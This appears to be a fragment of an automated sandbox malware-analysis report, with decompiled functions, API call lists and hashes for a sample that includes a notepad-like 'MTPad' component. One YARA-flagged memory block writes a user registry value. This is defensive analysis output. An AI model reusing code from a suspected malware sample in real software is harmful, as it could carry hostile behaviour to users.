                                                                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 000F43F2
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000F43FC
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(000F0000,?,00000104), ref: 000F4480
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000F44D1
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 000F457A
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 000F45E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F2050: EnterCriticalSection.KERNEL32(?,1F9A9BDF,?,?,000F0000,000F4281,00112CF0,Module,?), ref: 000F209B
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F2050: lstrlenW.KERNEL32(00112CF0), ref: 000F20A8
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F27A0: lstrlenW.KERNEL32(REGISTRY,1F9A9BDF,00000000,?,00000000,?,00112CF0,Module,?), ref: 000F27D8
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F27A0: WideCharToMultiByte.KERNEL32(00000003,00000000,REGISTRY,000000FF,00000008,00000001,00000000,00000000), ref: 000F2857
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CriticalModuleSection$ByteCharCountEnterErrorFileHandleInitializeLastMultiNameSpinWide
                                                                                                                                                                                                                                                                                          • String ID: Module$Module_Raw
                                                                                                                                                                                                                                                                                          • API String ID: 1217862086-3885325121
                                                                                                                                                                                                                                                                                          • Opcode ID: 5a8366e40af17c00eca91ff8d7ac5ff4d6d44577dde59959bda6d7f83e51ac56
                                                                                                                                                                                                                                                                                          • Instruction ID: 6791695c461433a8196ed0f44d9acf97d20671f4e4b956c684cd05ff08752d4d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a8366e40af17c00eca91ff8d7ac5ff4d6d44577dde59959bda6d7f83e51ac56
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34915C7190122C8BEB60EB64CC81AFEB3B5AF84300F0445A9EA09E7513DB75AE85DF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F9F00(long* __eax, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				struct tagMSG _v32;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          				long* _t49;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t49 = __eax;
                                                                                                                                                                                                                                                                                          				PeekMessageA( &_v32, 0, 0x400, 0x400, 0);
                                                                                                                                                                                                                                                                                          				E000F9E80(_a8, _t49, _a4, _a8);
                                                                                                                                                                                                                                                                                          				_t23 =  *_t49;
                                                                                                                                                                                                                                                                                          				_a8 = _t23;
                                                                                                                                                                                                                                                                                          				if(_t23 != 0) {
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t47 = MsgWaitForMultipleObjects( *_t49,  &(_t49[1]), 0, 0xffffffff, 0xff);
                                                                                                                                                                                                                                                                                          						if(_t47 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          							_t27 =  *_t49;
                                                                                                                                                                                                                                                                                          							_t6 = _t27 - 1; // -1
                                                                                                                                                                                                                                                                                          							_t41 = _t6;
                                                                                                                                                                                                                                                                                          							if(_t47 > _t6) {
                                                                                                                                                                                                                                                                                          								if(_t47 != _t27) {
                                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                                          									MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                                                                                                                                                          								if(_v32.message != 0x400) {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E000F9E80(_t41, _t49, 0x11293e, 1);
                                                                                                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CloseHandle( *(_t49 + 4 + _t47 * 4));
                                                                                                                                                                                                                                                                                          							_t34 =  *_t49;
                                                                                                                                                                                                                                                                                          							_t10 = _t34 - 1; // -1
                                                                                                                                                                                                                                                                                          							if(_t47 != _t10) {
                                                                                                                                                                                                                                                                                          								 *(_t49 + 4 + _t47 * 4) = _t49[_t34];
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *_t49 =  *_t49 - 1;
                                                                                                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						MessageBoxA(0, "Wait for multiple objects failed!!!", "MTPad", 0);
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          					} while ( *_t49 > 0);
                                                                                                                                                                                                                                                                                          					return _a8;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t23;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x000f9f13
                                                                                                                                                                                                                                                                                          0x000f9f1b
                                                                                                                                                                                                                                                                                          0x000f9f29
                                                                                                                                                                                                                                                                                          0x000f9f2e
                                                                                                                                                                                                                                                                                          0x000f9f32
                                                                                                                                                                                                                                                                                          0x000f9f37
                                                                                                                                                                                                                                                                                          0x000f9f45
                                                                                                                                                                                                                                                                                          0x000f9f57
                                                                                                                                                                                                                                                                                          0x000f9f5c
                                                                                                                                                                                                                                                                                          0x000f9f74
                                                                                                                                                                                                                                                                                          0x000f9f76
                                                                                                                                                                                                                                                                                          0x000f9f76
                                                                                                                                                                                                                                                                                          0x000f9f7b
                                                                                                                                                                                                                                                                                          0x000f9f9e
                                                                                                                                                                                                                                                                                          0x000f9fc7
                                                                                                                                                                                                                                                                                          0x000f9fc9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9fc9
                                                                                                                                                                                                                                                                                          0x000f9faa
                                                                                                                                                                                                                                                                                          0x000f9fb7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9fc0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9fc0
                                                                                                                                                                                                                                                                                          0x000f9f82
                                                                                                                                                                                                                                                                                          0x000f9f88
                                                                                                                                                                                                                                                                                          0x000f9f8a
                                                                                                                                                                                                                                                                                          0x000f9f8f
                                                                                                                                                                                                                                                                                          0x000f9f94
                                                                                                                                                                                                                                                                                          0x000f9f94
                                                                                                                                                                                                                                                                                          0x000f9f98
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9f98
                                                                                                                                                                                                                                                                                          0x000f9f6c
                                                                                                                                                                                                                                                                                          0x000f9fcf
                                                                                                                                                                                                                                                                                          0x000f9fcf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9fdc
                                                                                                                                                                                                                                                                                          0x000f9fe1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000400,00000400,00000000), ref: 000F9F1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F9E80: MessageBoxA.USER32 ref: 000F9E97
                                                                                                                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 000F9F55
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F9F6C
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000F9F82
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$CloseHandleMultipleObjectsPeekWait
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Wait for multiple objects failed!!!
                                                                                                                                                                                                                                                                                          • API String ID: 1409372293-1429448418
                                                                                                                                                                                                                                                                                          • Opcode ID: 00d3e11cf13cf8ffd26c41d66e506fc0ff70f6cb77c1a87abb637be73ab59e26
                                                                                                                                                                                                                                                                                          • Instruction ID: 8224d14a61a0d9aec00a13e8f2639ab9da47d6e98fdcb016041d364600a18659
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00d3e11cf13cf8ffd26c41d66e506fc0ff70f6cb77c1a87abb637be73ab59e26
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12216531644209AFD724DF58CC89FBAB3E9AB48721F208529F751D75C0DBB0A984DB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,04013CA0), ref: 0252772E
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04011898), ref: 02527741
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0252541F,00000000,000F003F,00000000), ref: 0252777A
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000020), ref: 025277B9
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 02527802
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0252780C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 764223185-227171996
                                                                                                                                                                                                                                                                                          • Opcode ID: da7619e2ec26fd526603613a89bb6260e08c8b3ebb1e99e0e601b59341468cfb
                                                                                                                                                                                                                                                                                          • Instruction ID: c62f6944d846b9455900a3046ebbc8a770b7a7c0c229c7e8d0de3207eb563371
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da7619e2ec26fd526603613a89bb6260e08c8b3ebb1e99e0e601b59341468cfb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C231437195021CABEB14CF90DC45FFEBB78FB49704F048598EA04A61C0D7B95A84CFA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E000FC640(void** __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v520;
                                                                                                                                                                                                                                                                                          				intOrPtr _v524;
                                                                                                                                                                                                                                                                                          				struct _PRINTER_DEFAULTS* _v528;
                                                                                                                                                                                                                                                                                          				struct _PRINTER_DEFAULTS* _v532;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                                                                          				CHAR* _t23;
                                                                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				void** _t33;
                                                                                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t33 = __esi;
                                                                                                                                                                                                                                                                                          				_t14 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t14 ^ _t34;
                                                                                                                                                                                                                                                                                          				_t16 =  *__esi;
                                                                                                                                                                                                                                                                                          				if(_t16 != 0) {
                                                                                                                                                                                                                                                                                          					ClosePrinter(_t16);
                                                                                                                                                                                                                                                                                          					 *__esi = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v520 = 0;
                                                                                                                                                                                                                                                                                          				GetProfileStringA("windows", "device", ",,,",  &_v520, 0x200);
                                                                                                                                                                                                                                                                                          				if(lstrlenA( &_v520) != 0) {
                                                                                                                                                                                                                                                                                          					_t23 =  &_v520;
                                                                                                                                                                                                                                                                                          					if(_v520 != 0) {
                                                                                                                                                                                                                                                                                          						_push(_t31);
                                                                                                                                                                                                                                                                                          						while( *_t23 != 0x2c) {
                                                                                                                                                                                                                                                                                          							_t23 = CharNextA(_t23);
                                                                                                                                                                                                                                                                                          							if( *_t23 != 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                                                                                                          							_pop(_t31);
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *_t23 = 0;
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                                                                                          					_t30 =  &_v520;
                                                                                                                                                                                                                                                                                          					_v532 = 0;
                                                                                                                                                                                                                                                                                          					_v528 = 0;
                                                                                                                                                                                                                                                                                          					_v524 = 8;
                                                                                                                                                                                                                                                                                          					OpenPrinterA( &_v520, _t33, 0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(0 |  *_t33 != 0x00000000, _t26, _v8 ^ _t34, _t30, _t31, _t33);
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x000fc640
                                                                                                                                                                                                                                                                                          0x000fc649
                                                                                                                                                                                                                                                                                          0x000fc650
                                                                                                                                                                                                                                                                                          0x000fc653
                                                                                                                                                                                                                                                                                          0x000fc657
                                                                                                                                                                                                                                                                                          0x000fc65a
                                                                                                                                                                                                                                                                                          0x000fc660
                                                                                                                                                                                                                                                                                          0x000fc660
                                                                                                                                                                                                                                                                                          0x000fc681
                                                                                                                                                                                                                                                                                          0x000fc688
                                                                                                                                                                                                                                                                                          0x000fc69d
                                                                                                                                                                                                                                                                                          0x000fc6a6
                                                                                                                                                                                                                                                                                          0x000fc6ac
                                                                                                                                                                                                                                                                                          0x000fc6ae
                                                                                                                                                                                                                                                                                          0x000fc6b5
                                                                                                                                                                                                                                                                                          0x000fc6bb
                                                                                                                                                                                                                                                                                          0x000fc6c0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fc6c2
                                                                                                                                                                                                                                                                                          0x000fc6c7
                                                                                                                                                                                                                                                                                          0x000fc6c7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fc6c7
                                                                                                                                                                                                                                                                                          0x000fc6c4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fc6c4
                                                                                                                                                                                                                                                                                          0x000fc6c8
                                                                                                                                                                                                                                                                                          0x000fc6cb
                                                                                                                                                                                                                                                                                          0x000fc6d2
                                                                                                                                                                                                                                                                                          0x000fc6dc
                                                                                                                                                                                                                                                                                          0x000fc6e6
                                                                                                                                                                                                                                                                                          0x000fc6f0
                                                                                                                                                                                                                                                                                          0x000fc6f0
                                                                                                                                                                                                                                                                                          0x000fc70a

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ClosePrinter.WINSPOOL.DRV(1F9A9BDF), ref: 000FC65A
                                                                                                                                                                                                                                                                                          • GetProfileStringA.KERNEL32(windows,device,,,,,?,00000200), ref: 000FC688
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000FC695
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?), ref: 000FC6BB
                                                                                                                                                                                                                                                                                          • OpenPrinterA.WINSPOOL.DRV(00000000,?,00000000), ref: 000FC6F0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharCloseNextOpenPrinterPrinter.ProfileStringlstrlen
                                                                                                                                                                                                                                                                                          • String ID: ,,,$device$windows
                                                                                                                                                                                                                                                                                          • API String ID: 2618371523-1718292371
                                                                                                                                                                                                                                                                                          • Opcode ID: f9e7bba600aa9a2e7f95a8bed9d8114534a15d5c2ed86b9cf8d0f76b44b0add0
                                                                                                                                                                                                                                                                                          • Instruction ID: b058740a4c02bade7bf265da17486e46bf1a541e046e9b6dcd016e73519db898
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9e7bba600aa9a2e7f95a8bed9d8114534a15d5c2ed86b9cf8d0f76b44b0add0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1118EB090430C9FEB659F24DE4DFAABBF8AB15304F108498E544D7591D7B499C4CF64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E00102580(signed int __eax, signed int __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				long _t75;
                                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                                                                                                          				int _t132;
                                                                                                                                                                                                                                                                                          				long _t133;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t124 = __eax;
                                                                                                                                                                                                                                                                                          				_t98 = __edx;
                                                                                                                                                                                                                                                                                          				_t128 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__edx == 0) {
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t1 = _t98 - 0x24; // -72
                                                                                                                                                                                                                                                                                          					_v8 = _t1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_v8 + 4), 0x434, 0,  &_v32);
                                                                                                                                                                                                                                                                                          				_t102 = _v28;
                                                                                                                                                                                                                                                                                          				_t74 = _v32;
                                                                                                                                                                                                                                                                                          				if( *(_t98 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                          					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t98 + 0x20) = _t102;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *(_t98 + 0x20) = _t74;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t98 + 0x10) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v24 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t74 != _t102) {
                                                                                                                                                                                                                                                                                          					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          						_v32 = (0 | _t74 <= 0x00000000) - 0x00000001 & _t74;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v32 = _t74 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          				asm("sbb edi, edi");
                                                                                                                                                                                                                                                                                          				_a4 =  ~_t128 & 0x00000004 |  ~_t124 & 0x00000002;
                                                                                                                                                                                                                                                                                          				_t132 = _v8;
                                                                                                                                                                                                                                                                                          				_t75 = SendMessageA( *(_t132 + 4), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          				_t103 =  *(_t98 + 0x20);
                                                                                                                                                                                                                                                                                          				_v28 = _t75 + _t103;
                                                                                                                                                                                                                                                                                          				if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          					if(_t103 >= 0) {
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_a4 = _a4 & 0xfffffffe;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t103 >= 0) {
                                                                                                                                                                                                                                                                                          						_v28 = SendMessageA( *(_t132 + 4), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_a4 = _a4 | 0x00000001;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t77 = _t132 + 0x24;
                                                                                                                                                                                                                                                                                          				_v12 = _t77;
                                                                                                                                                                                                                                                                                          				if(_t77 == 0) {
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v8 = _t77 + 0xffffffdc;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(SendMessageA( *(_v8 + 4), 0x44f, _a4,  &_v32) == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_t80 =  *(_t98 + 0x20);
                                                                                                                                                                                                                                                                                          					if(_t80 <= 0) {
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_a8 == 0) {
                                                                                                                                                                                                                                                                                          							_v32 = SendMessageA( *(_t132 + 4), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          							_v28 =  *(_t98 + 0x20);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                                          							_v28 = _t80;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t98 + 0x20) =  *(_t98 + 0x20) - SendMessageA( *(_t132 + 4), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          						_t85 = _v12;
                                                                                                                                                                                                                                                                                          						if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          							_t99 = 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t62 = _t85 - 0x24; // 0xda
                                                                                                                                                                                                                                                                                          							_t99 = _t62;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t133 = SendMessageA( *(_t99 + 4), 0x44f, _a4,  &_v32);
                                                                                                                                                                                                                                                                                          						if(_t133 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t99 + 4), 0x437, 0,  &_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return 0 | _t133 != 0xffffffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_v8 + 4), 0x437, 0,  &_v20);
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                                          0x00102589
                                                                                                                                                                                                                                                                                          0x0010258b
                                                                                                                                                                                                                                                                                          0x0010258f
                                                                                                                                                                                                                                                                                          0x00102593
                                                                                                                                                                                                                                                                                          0x0010259d
                                                                                                                                                                                                                                                                                          0x00102595
                                                                                                                                                                                                                                                                                          0x00102595
                                                                                                                                                                                                                                                                                          0x00102598
                                                                                                                                                                                                                                                                                          0x00102598
                                                                                                                                                                                                                                                                                          0x001025a5
                                                                                                                                                                                                                                                                                          0x001025a8
                                                                                                                                                                                                                                                                                          0x001025ab
                                                                                                                                                                                                                                                                                          0x001025ae
                                                                                                                                                                                                                                                                                          0x001025b1
                                                                                                                                                                                                                                                                                          0x001025c0
                                                                                                                                                                                                                                                                                          0x001025ca
                                                                                                                                                                                                                                                                                          0x001025cd
